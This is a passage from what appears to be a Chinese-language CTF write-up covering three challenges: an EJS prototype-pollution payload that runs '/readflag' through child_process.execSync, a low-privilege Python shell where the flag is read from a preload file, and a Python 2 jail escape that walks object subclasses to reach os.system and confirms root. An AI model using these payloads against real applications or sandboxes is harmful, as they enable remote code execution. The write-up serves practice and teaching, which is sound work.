CMD ["node", "./main.js"]

有一个关键点,他ban了outputFunctionName 这说明这道题目只有原型链污染和模板注入这两个可能,根据

https://github.com/mde/ejs/issues/730

可以找到其他的可污染对象作为利用

根据其可以构造出

greet?name=1&font=Arial&fontSize=20&settings[view options][client]=1&settings[view options][escape]={}.constructor.constructor("return process.mainModule.require('child_process').execSync('/readflag >> /home/ejs/app/views/index.ejs')")

去执行readflag,将他输出到index.ejs,来读取flag

[NSSRound#12 Basic]strange python

很有意思的一道题目

拿到的是一个标准python shell,命令执行没有限制,但是权限很低,通过env看到并没有flag,也没有放在根目录下

$ env
env
MAIL=/var/mail/ctf
USER=ctf
HOSTNAME=0476e736174f4dea
SHLVL=1
SOCAT_PEERADDR=109.166.37.80
HOME=/home/ctf
SOCAT_PEERPORT=59998
SOCAT_SOCKADDR=172.18.0.10
LC_CTYPE=C.UTF-8
SOCAT_VERSION=1.7.4.1
SOCAT_SOCKPORT=9999
LOGNAME=ctf
_=ls
COLUMNS=80
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
PYTHONSTARTUP=/opt/python/preload.py
SHELL=/bin/sh
PWD=/
SOCAT_PID=27
SOCAT_PPID=10
LINES=24
FLAG=no_FLAG
$ cat /opt/python/preload.py
cat /opt/python/preload.py
cat: /opt/python/preload.py: Permission denied
$ ls -la /opt/python/preload.py
ls -la /opt/python/preload.py
-rwx-w---- 1 root root 209 May 13 06:19 /opt/python/preload.py

可以看到权限很高,回到python shell dir() 命令看到作用域内存在一个__flag__ 读取后是被打乱的flag,猜测就是用preload加载的,既然python能加载,那就可以尝试用python的open命令读取

neko@aosc-neko205 [ ~ ] $ nc node4.anna.nssctf.cn 28111
Python 3.10.6 (main, Mar 10 2023, 10:55:28) [GCC 11.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> dir()
dir()
['__annotations__', '__builtins__', '__doc__', '__flag__', '__loader__', '__name__', '__package__', '__spec__', 'random', 'seed', 'shuffle']
>>> __flag__
__flag__
['9f', '66', '1f', 'SC', '-4', 'd-', '31', '9e', 'd4', 'NS', '9f', 'cf', '8}', 'TF', '-7', '16', '26', '5b', '57', '88', '{d', '1-']
>>> open('/opt/python/preload.py').read()
open('/opt/python/preload.py').read()
'import re\nimport random\nfrom random import shuffle\nseed=114514\nrandom.seed(114514)\nflag="NSSCTF{dd457881-1626-4cfd-9f31-75b9e9f661f8}"\nflag=re.findall(r\'.{2}\', flag)\nshuffle(flag)\n__flag__=flag\ndel re\ndel flag'
>>>

[NCTF 2018]baby Python

测试过后会发现,如果成功执行会返回Wh4t_Th3_Err0r? ,要回显需要print

>>> print(dir())   
['Th1s_1S_WAF', '__builtins__', '__doc__', '__file__', '__name__', '__package__', 'data', 'no', 'print_function', 'targets', 'x']
>>> print(Th1s_1S_WAF)
['import', 'exec', 'eval', 'pickle', 'os', 'subprocess', 'input', 'cry sum more', 'sys', 'linecache', 'globals', 'flag', 'file', 'pop', 'getattr', 'class', 'mro', 'bases', 'subclasses', 'init', ']', '[']
>>>

WAF应该就是ban表

>>> print(__builtins__.__dict__)
{'dir': <built-in function dir>, 'print': <built-in function print>, 'raw_input': <built-in function raw_input>}

夸张。。内置被删干净了,那就从继承链条来逃逸,先找下他的子类

>>> print([].__class__.__base__.__subclasses__())Wh4t_Th3_Err0r?
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'PyCapsule'>, <type 'cell'>, <type 'callable-iterator'>, <type 'iterator'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'fieldnameiterator'>, <type 'formatteriterator'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <type 'dict_keys'>, <type 'dict_items'>, <type 'dict_values'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>]

找了很久,发现可以使用<class 'warnings.catch_warnings'> 在比对了本地的python2和靶机的环境后发现两者的子类列表没有什么区别,遂用本地的python2跑表

for i in enumerate(''.__class__.__mro__[-1].__subclasses__()): print i
(59, <class 'warnings.catch_warnings'>)

print([].__class__.__base__.__subclasses__()[59].__init__.__globals__)

找linecache模块,init调用globals返回函数所在模块的所有全局变量

>>> print([].__class__.__base__.__subclasses__()[59].__init__.__globals__)
{'filterwarnings': <function filterwarnings at 0x7f094be1c7d0>, 'once_registry': {}, 'WarningMessage': <class 'warnings.WarningMessage'>, '_show_warning': <function _show_warning at 0x7f094be1c450>, 'filters': [('ignore', None, <type 'exceptions.DeprecationWarning'>, None, 0), ('ignore', None, <type 'exceptions.PendingDeprecationWarning'>, None, 0), ('ignore', None, <type 'exceptions.ImportWarning'>, None, 0), ('ignore', None, <type 'exceptions.BytesWarning'>, None, 0)], '_setoption': <function _setoption at 0x7f094be1cbd0>, 'showwarning': <function _show_warning at 0x7f094be1c450>, '__all__': ['warn', 'warn_explicit', 'showwarning', 'formatwarning', 'filterwarnings', 'simplefilter', 'resetwarnings', 'catch_warnings'], 'onceregistry': {}, '__package__': None, 'simplefilter': <function simplefilter at 0x7f094be1c8d0>, 'default_action': 'default', '_getcategory': <function _getcategory at 0x7f094be1ca50>, '__builtins__': {'dir': <built-in function dir>, 'print': <built-in function print>, 'raw_input': <built-in function raw_input>}, 'catch_warnings': <class 'warnings.catch_warnings'>, '__file__': '/usr/local/lib/python2.7/warnings.pyc', 'warnpy3k': <function warnpy3k at 0x7f094be1c9d0>, 'sys': <module 'sys' (built-in)>, '__name__': 'warnings', 'warn_explicit': <built-in function warn_explicit>, 'types': <module 'types' from '/usr/local/lib/python2.7/types.pyc'>, 'warn': <built-in function warn>, '_processoptions': <function _processoptions at 0x7f094be1c950>, 'defaultaction': 'default', '__doc__': 'Python part of the warnings subsystem.', 'linecache': <module 'linecache' from '/usr/local/lib/python2.7/linecache.pyc'>, '_OptionError': <class 'warnings._OptionError'>, 'resetwarnings': <function resetwarnings at 0x7f094be1c850>, 'formatwarning': <function formatwarning at 0x7f094be1c750>, '_getaction': <function _getaction at 0x7f094be1cad0>}

其中的目标就是

<module 'linecache' from '/usr/local/lib/python2.7/linecache.pyc'>

>>> print(dir([].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache']))
['__all__', '__builtins__', '__doc__', '__file__', '__name__', '__package__', 'cache', 'checkcache', 'clearcache', 'getline', 'getlines', 'os', 'sys', 'updatecache']

>>> print([].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].os.system('id'))
uid=0(root) gid=0(root) groups=0(root)
0

pass